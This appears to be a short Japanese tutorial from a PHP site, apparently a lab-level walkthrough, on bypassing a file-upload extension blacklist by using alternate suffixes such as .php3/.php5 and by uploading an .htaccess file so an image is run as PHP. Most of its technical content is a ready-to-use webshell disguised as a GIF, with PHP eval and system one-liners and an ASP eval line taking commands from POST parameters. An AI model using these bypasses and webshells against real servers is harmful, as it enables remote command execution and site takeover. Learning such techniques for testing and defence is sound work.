ファイルをアップロードするときにブラックリストを回避する方法

不言
リリース: 2023-04-02 14:20:02
オリジナル
6134 人が閲覧しました

この記事では主に、ファイルをアップロードしてブラックリストを回避する方法を紹介します。これには特定の参考値があります。今、あなたと共有します。必要な友達はそれを参照できます。

このレベルでは主に、アップロードサフィックス. 、asp、php、jsp などのサフィックスを制限し、アップロードは許可されません。

位置 1: このバイパス方法は、サフィックスを .php3、php5 などに変更することです。ブラックリストの検証は次のとおりです ('.asp'、'.aspx'、'.php'、'.jsp') ) を使用すると、php3、php5... およびサーバーで解析できるその他のサフィックス名をアップロードできます

##ポジション 2: ファイル解析ルールをバイパスするように書き換えます

1. まずアップロードします。次の内容を含む

.htaccess

という名前のファイルをアップロードします:

# SetHandler application/x-httpd-php

2. 1.jpg スクリプトをアップロードします

内容:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>
ログイン後にコピー

<span style="margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
ログイン後にコピー

上記がこの記事の全内容です。関連コンテンツについては、PHP 中国語 Web サイトをご覧ください。

関連する推奨事項:

PHP は Azure Storage Blob を使用してファイルをアップロードします


nginx memcache キャッシュの概要

以上がファイルをアップロードするときにブラックリストを回避する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート